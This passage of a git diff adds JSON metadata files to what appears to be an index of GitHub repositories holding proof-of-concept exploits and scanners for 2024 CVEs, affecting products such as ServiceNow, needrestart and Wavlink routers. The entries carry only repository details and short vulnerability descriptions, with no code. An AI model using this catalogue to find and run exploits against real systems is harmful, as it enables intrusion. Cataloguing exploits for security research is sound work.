"2024-10-21T21:33:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48644.json b/2024/CVE-2024-48644.json new file mode 100644 index 0000000000..626bd16bdc --- /dev/null +++ b/2024/CVE-2024-48644.json @@ -0,0 +1,33 @@ +[ + { + "id": 874489228, + "name": "CVE-2024-48644", + "full_name": "rosembergpro\/CVE-2024-48644", + "owner": { + "login": "rosembergpro", + "id": 7573860, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7573860?v=4", + "html_url": "https:\/\/github.com\/rosembergpro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rosembergpro\/CVE-2024-48644", + "description": "Reolink Duo 2 WiFi v1.0.280 - Account Enumeration Vulnerability", + "fork": false, + "created_at": "2024-10-17T23:27:04Z", + "updated_at": "2024-10-18T02:21:47Z", + "pushed_at": "2024-10-18T02:21:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48652.json b/2024/CVE-2024-48652.json new file mode 100644 index 0000000000..d90aa6c327 --- /dev/null +++ b/2024/CVE-2024-48652.json @@ -0,0 +1,33 @@ +[ + { + "id": 875183000, + "name": "CVE-2024-48652", + "full_name": "paragbagul111\/CVE-2024-48652", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2024-48652", + "description": "Cross Site Scripting vulnerability in camaleon-cms v.2.7.5 allows remote attacker to execute arbitrary code via the content group name field", + "fork": false, + "created_at": "2024-10-19T10:06:58Z", + "updated_at": "2024-10-19T10:21:13Z", + "pushed_at": "2024-10-19T10:21:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48705.json b/2024/CVE-2024-48705.json new file mode 100644 index 0000000000..c0a029f62b --- /dev/null +++ b/2024/CVE-2024-48705.json @@ -0,0 +1,33 @@ +[ + { + "id": 899256024, + "name": "CVE-2024-48705", + "full_name": "L41KAA\/CVE-2024-48705", + "owner": { + "login": "L41KAA", + "id": 54420351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54420351?v=4", + "html_url": "https:\/\/github.com\/L41KAA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/L41KAA\/CVE-2024-48705", + "description": "Wavlink AC1200 with firmware versions M32A3_V1410_230602 and M32A3_V1410_240222 are vulnerable to a post-authentication command injection while resetting the password. This vulnerability is specifically found within the \"set_sys_adm\" function of the \"adm.cgi\" binary, and is due to improper santization of the user provided \"newpass\" field.", + "fork": false, + "created_at": "2024-12-05T22:45:58Z", + "updated_at": "2024-12-05T23:01:09Z", + "pushed_at": "2024-12-05T23:01:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4875.json b/2024/CVE-2024-4875.json new file mode 100644 index 0000000000..80b1ecc911 --- /dev/null +++ b/2024/CVE-2024-4875.json @@ -0,0 +1,33 @@ +[ + { + "id": 803866868, + "name": "CVE-2024-4875", + "full_name": "RandomRobbieBF\/CVE-2024-4875", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-4875", + "description": "HT Mega – Absolute Addons For Elementor <= 2.5.2 - Missing Authorization to Options Update", + "fork": false, + "created_at": "2024-05-21T14:15:16Z", + "updated_at": "2024-07-11T16:38:38Z", + "pushed_at": "2024-05-21T14:17:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48762.json b/2024/CVE-2024-48762.json new file mode 100644 index 0000000000..9840af04d6 --- /dev/null +++ b/2024/CVE-2024-48762.json @@ -0,0 +1,33 @@ +[ + { + "id": 866653207, + "name": "CVE-2024-48762", + "full_name": "YZS17\/CVE-2024-48762", + "owner": { + "login": "YZS17", + "id": 153406185, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153406185?v=4", + "html_url": "https:\/\/github.com\/YZS17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YZS17\/CVE-2024-48762", + "description": "Command injection vulnerability in FLIR AX8 up to 1.46.16", + "fork": false, + "created_at": "2024-10-02T16:32:08Z", + "updated_at": "2024-12-18T13:37:21Z", + "pushed_at": "2024-12-18T13:37:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4879.json b/2024/CVE-2024-4879.json new file mode 100644 index 0000000000..f6cc1eb655 --- /dev/null +++ b/2024/CVE-2024-4879.json @@ -0,0 +1,281 @@ +[ + { + "id": 827768710, + "name": "CVE-2024-4879", + "full_name": "Brut-Security\/CVE-2024-4879", + "owner": { + "login": "Brut-Security", + "id": 172168319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168319?v=4", + "html_url": "https:\/\/github.com\/Brut-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Brut-Security\/CVE-2024-4879", + "description": "CVE-2024-4879 - Jelly Template Injection Vulnerability in ServiceNow", + "fork": false, + "created_at": "2024-07-12T10:32:37Z", + "updated_at": "2024-10-28T17:52:37Z", + "pushed_at": "2024-07-13T10:46:32Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 22, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 827823810, + "name": "CVE-2024-4879", + "full_name": "bigb0x\/CVE-2024-4879", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-4879", + "description": "Bulk scanning tool for ServiceNow CVE-2024-4879 vulnerability", + "fork": false, + "created_at": "2024-07-12T13:02:47Z", + "updated_at": "2024-08-25T03:37:27Z", + "pushed_at": "2024-07-12T20:48:26Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828006472, + "name": "CVE-2024-4879", + "full_name": "Mr-r00t11\/CVE-2024-4879", + "owner": { + "login": "Mr-r00t11", + "id": 68824333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68824333?v=4", + "html_url": "https:\/\/github.com\/Mr-r00t11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-r00t11\/CVE-2024-4879", + "description": null, + "fork": false, + "created_at": "2024-07-12T21:43:48Z", + "updated_at": "2024-08-29T13:31:14Z", + "pushed_at": "2024-07-12T21:46:19Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828935876, + "name": "CVE-2024-4879", + "full_name": "ShadowByte1\/CVE-2024-4879", + "owner": { + "login": "ShadowByte1", + "id": 155693555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155693555?v=4", + "html_url": "https:\/\/github.com\/ShadowByte1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShadowByte1\/CVE-2024-4879", + "description": null, + "fork": false, + "created_at": "2024-07-15T12:27:33Z", + "updated_at": "2024-07-15T13:22:33Z", + "pushed_at": "2024-07-15T13:22:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 829246851, + "name": "CVE-2024-4879-ServiceNow", + "full_name": "Praison001\/CVE-2024-4879-ServiceNow", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-4879-ServiceNow", + "description": "Exploit for CVE-2024-4879 affecting Vancouver, Washington DC Now and Utah Platform releases", + "fork": false, + "created_at": "2024-07-16T04:03:28Z", + "updated_at": "2024-07-16T04:27:47Z", + "pushed_at": "2024-07-16T04:26:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834723031, + "name": "CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning", + "full_name": "NoTsPepino\/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning", + "owner": { + "login": "NoTsPepino", + "id": 107086092, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107086092?v=4", + "html_url": "https:\/\/github.com\/NoTsPepino", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NoTsPepino\/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning", + "description": "CVE-2024-4879 & CVE-2024-5217 ServiceNow RCE Scanning Using Nuclei & Shodan Dork to find it.", + "fork": false, + "created_at": "2024-07-28T06:51:33Z", + "updated_at": "2024-08-07T14:31:30Z", + "pushed_at": "2024-08-03T03:09:56Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 842345831, + "name": "CVE-2024-4879", + "full_name": "jdusane\/CVE-2024-4879", + "owner": { + "login": "jdusane", + "id": 16679951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16679951?v=4", + "html_url": "https:\/\/github.com\/jdusane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jdusane\/CVE-2024-4879", + "description": "Python script designed to detect specific vulnerabilities in ServiceNow instances and dump database connection details if the vulnerability is found. This tool is particularly useful for security researchers and penetration testers.", + "fork": false, + "created_at": "2024-08-14T06:55:41Z", + "updated_at": "2024-08-14T07:00:05Z", + "pushed_at": "2024-08-14T07:00:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848057101, + "name": "CVE-2024-4879", + "full_name": "gh-ost00\/CVE-2024-4879", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-4879", + "description": "Jelly Template Injection Vulnerability in ServiceNow | POC CVE-2024-4879", + "fork": false, + "created_at": "2024-08-27T03:43:28Z", + "updated_at": "2024-09-12T02:37:10Z", + "pushed_at": "2024-08-27T03:56:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856665318, + "name": "CVE-2024-4879", + "full_name": "0xWhoami35\/CVE-2024-4879", + "owner": { + "login": "0xWhoami35", + "id": 107396843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107396843?v=4", + "html_url": "https:\/\/github.com\/0xWhoami35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xWhoami35\/CVE-2024-4879", + "description": null, + "fork": false, + "created_at": "2024-09-13T01:20:34Z", + "updated_at": "2024-09-13T01:33:09Z", + "pushed_at": "2024-09-13T01:33:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4883.json b/2024/CVE-2024-4883.json new file mode 100644 index 0000000000..e8d86a72bc --- /dev/null +++ b/2024/CVE-2024-4883.json @@ -0,0 +1,33 @@ +[ + { + "id": 825745361, + "name": "CVE-2024-4883", + "full_name": "sinsinology\/CVE-2024-4883", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-4883", + "description": "Exploit for CVE-2024-4883", + "fork": false, + "created_at": "2024-07-08T12:14:01Z", + "updated_at": "2024-12-28T12:42:55Z", + "pushed_at": "2024-07-08T12:14:18Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4885.json b/2024/CVE-2024-4885.json new file mode 100644 index 0000000000..b00b0c0a61 --- /dev/null +++ b/2024/CVE-2024-4885.json @@ -0,0 +1,33 @@ +[ + { + "id": 825745644, + "name": "CVE-2024-4885", + "full_name": "sinsinology\/CVE-2024-4885", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-4885", + "description": "Exploit for CVE-2024-4885", + "fork": false, + "created_at": "2024-07-08T12:14:42Z", + "updated_at": "2024-12-28T12:42:54Z", + "pushed_at": "2024-07-08T12:15:00Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48914.json b/2024/CVE-2024-48914.json new file mode 100644 index 0000000000..f05a37340e --- /dev/null +++ b/2024/CVE-2024-48914.json @@ -0,0 +1,41 @@ +[ + { + "id": 876045350, + "name": "CVE-2024-48914", + "full_name": "EQSTLab\/CVE-2024-48914", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-48914", + "description": "PoC for CVE-2024-48914", + "fork": false, + "created_at": "2024-10-21T10:02:05Z", + "updated_at": "2024-11-20T16:31:08Z", + "pushed_at": "2024-10-21T10:50:16Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "poc", + "proof-of-concept", + "security", + "typescript", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48955.json b/2024/CVE-2024-48955.json new file mode 100644 index 0000000000..1bba542e48 --- /dev/null +++ b/2024/CVE-2024-48955.json @@ -0,0 +1,33 @@ +[ + { + "id": 880290163, + "name": "CVE-2024-48955_Overview", + "full_name": "BrotherOfJhonny\/CVE-2024-48955_Overview", + "owner": { + "login": "BrotherOfJhonny", + "id": 28454566, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28454566?v=4", + "html_url": "https:\/\/github.com\/BrotherOfJhonny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BrotherOfJhonny\/CVE-2024-48955_Overview", + "description": "CVE-2024-48955_Overview", + "fork": false, + "created_at": "2024-10-29T13:14:19Z", + "updated_at": "2024-10-29T13:32:43Z", + "pushed_at": "2024-10-29T13:32:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4898.json b/2024/CVE-2024-4898.json new file mode 100644 index 0000000000..b76a5ec506 --- /dev/null +++ b/2024/CVE-2024-4898.json @@ -0,0 +1,64 @@ +[ + { + "id": 814085219, + "name": "CVE-2024-4898-Poc", + "full_name": "truonghuuphuc\/CVE-2024-4898-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-4898-Poc", + "description": "CVE-2024-4898 InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.38 - Missing Authorization to Unauthenticated API setup\/Arbitrary Options Update\/Administrative User Creation", + "fork": false, + "created_at": "2024-06-12T10:03:14Z", + "updated_at": "2024-12-21T07:07:20Z", + "pushed_at": "2024-06-12T10:23:05Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815012905, + "name": "CVE-2024-4898-Poc", + "full_name": "cve-2024\/CVE-2024-4898-Poc", + "owner": { + "login": "cve-2024", + "id": 172750025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4", + "html_url": "https:\/\/github.com\/cve-2024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cve-2024\/CVE-2024-4898-Poc", + "description": null, + "fork": false, + "created_at": "2024-06-14T07:01:58Z", + "updated_at": "2024-06-14T07:03:55Z", + "pushed_at": "2024-06-14T07:03:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48990.json b/2024/CVE-2024-48990.json new file mode 100644 index 0000000000..e31ff04fa8 --- /dev/null +++ b/2024/CVE-2024-48990.json @@ -0,0 +1,281 @@ +[ + { + "id": 891671184, + "name": "CVE-2024-48990-PoC", + "full_name": "makuga01\/CVE-2024-48990-PoC", + "owner": { + "login": "makuga01", + "id": 20490978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20490978?v=4", + "html_url": "https:\/\/github.com\/makuga01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/makuga01\/CVE-2024-48990-PoC", + "description": "PoC for CVE-2024-48990", + "fork": false, + "created_at": "2024-11-20T18:41:25Z", + "updated_at": "2025-01-07T22:14:12Z", + "pushed_at": "2024-11-20T18:49:33Z", + "stargazers_count": 93, + "watchers_count": 93, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 93, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892345016, + "name": "CVE-2024-48990", + "full_name": "ns989\/CVE-2024-48990", + "owner": { + "login": "ns989", + "id": 75913553, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75913553?v=4", + "html_url": "https:\/\/github.com\/ns989", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ns989\/CVE-2024-48990", + "description": "Exploit for CVE-2024-48990 (Local Privilege Escalation in needrestart < 3.8)", + "fork": false, + "created_at": "2024-11-21T23:59:49Z", + "updated_at": "2024-12-11T19:06:31Z", + "pushed_at": "2024-11-22T01:17:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892744239, + "name": "CVE-2024-48990", + "full_name": "felmoltor\/CVE-2024-48990", + "owner": { + "login": "felmoltor", + "id": 846513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/846513?v=4", + "html_url": "https:\/\/github.com\/felmoltor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/felmoltor\/CVE-2024-48990", + "description": "Qualys needsrestart vulnerability CVE-2024-48990", + "fork": false, + "created_at": "2024-11-22T17:35:58Z", + "updated_at": "2024-11-22T18:32:05Z", + "pushed_at": "2024-11-22T17:41:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893279532, + "name": "CVE-2024-48990-PoC", + "full_name": "Cyb3rFr0g\/CVE-2024-48990-PoC", + "owner": { + "login": "Cyb3rFr0g", + "id": 65209938, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65209938?v=4", + "html_url": "https:\/\/github.com\/Cyb3rFr0g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyb3rFr0g\/CVE-2024-48990-PoC", + "description": "My take on the needrestart Python CVE-2024-48990", + "fork": false, + "created_at": "2024-11-24T02:12:36Z", + "updated_at": "2024-11-25T09:01:21Z", + "pushed_at": "2024-11-24T02:32:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893347321, + "name": "CVE-2024-48990-PoC-Testing", + "full_name": "pentestfunctions\/CVE-2024-48990-PoC-Testing", + "owner": { + "login": "pentestfunctions", + "id": 144001335, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144001335?v=4", + "html_url": "https:\/\/github.com\/pentestfunctions", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pentestfunctions\/CVE-2024-48990-PoC-Testing", + "description": "Testing POC for use cases", + "fork": false, + "created_at": "2024-11-24T07:33:06Z", + "updated_at": "2024-12-25T00:47:09Z", + "pushed_at": "2024-11-24T07:56:49Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 893730273, + "name": "CVE-2024-48990-Exploit", + "full_name": "ally-petitt\/CVE-2024-48990-Exploit", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2024-48990-Exploit", + "description": "My exploit for CVE-2024-48990. Full details of how I made this are on my blog.", + "fork": false, + "created_at": "2024-11-25T05:28:20Z", + "updated_at": "2025-01-03T08:30:08Z", + "pushed_at": "2024-11-25T05:29:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 896921908, + "name": "CVE-2024-48990", + "full_name": "r0xdeadbeef\/CVE-2024-48990", + "owner": { + "login": "r0xdeadbeef", + "id": 65211256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65211256?v=4", + "html_url": "https:\/\/github.com\/r0xdeadbeef", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r0xdeadbeef\/CVE-2024-48990", + "description": "Needrestart, prior to version 3.8, contains a vulnerability that allows local attackers to execute arbitrary code with root privileges. This is achieved by manipulating the PYTHONPATH environment variable to trick needrestart into running the Python interpreter in an unsafe context.", + "fork": false, + "created_at": "2024-12-01T16:26:44Z", + "updated_at": "2024-12-02T17:27:46Z", + "pushed_at": "2024-12-01T16:27:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 900576461, + "name": "CVE-2024-48990", + "full_name": "CyberCrowCC\/CVE-2024-48990", + "owner": { + "login": "CyberCrowCC", + "id": 191075374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/191075374?v=4", + "html_url": "https:\/\/github.com\/CyberCrowCC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CyberCrowCC\/CVE-2024-48990", + "description": null, + "fork": false, + "created_at": "2024-12-09T04:28:40Z", + "updated_at": "2024-12-09T04:29:22Z", + "pushed_at": "2024-12-09T04:29:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 905043391, + "name": "CVE-2024-48990", + "full_name": "NullByte-7w7\/CVE-2024-48990", + "owner": { + "login": "NullByte-7w7", + "id": 121623691, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121623691?v=4", + "html_url": "https:\/\/github.com\/NullByte-7w7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NullByte-7w7\/CVE-2024-48990", + "description": null, + "fork": false, + "created_at": "2024-12-18T03:39:57Z", + "updated_at": "2024-12-19T18:16:50Z", + "pushed_at": "2024-12-19T18:16:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49039.json b/2024/CVE-2024-49039.json new file mode 100644 index 0000000000..96602aa853 --- /dev/null +++ b/2024/CVE-2024-49039.json @@ -0,0 +1,64 @@ +[ + { + "id": 890829788, + "name": "WPTaskScheduler_CVE-2024-49039", + "full_name": "je5442804\/WPTaskScheduler_CVE-2024-49039", + "owner": { + "login": "je5442804", + "id": 41533878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41533878?v=4", + "html_url": "https:\/\/github.com\/je5442804", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/je5442804\/WPTaskScheduler_CVE-2024-49039", + "description": "WPTaskScheduler RPC Persistence & CVE-2024-49039 via Task Scheduler", + "fork": false, + "created_at": "2024-11-19T08:57:18Z", + "updated_at": "2025-01-02T00:58:20Z", + "pushed_at": "2024-11-19T09:15:26Z", + "stargazers_count": 116, + "watchers_count": 116, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + 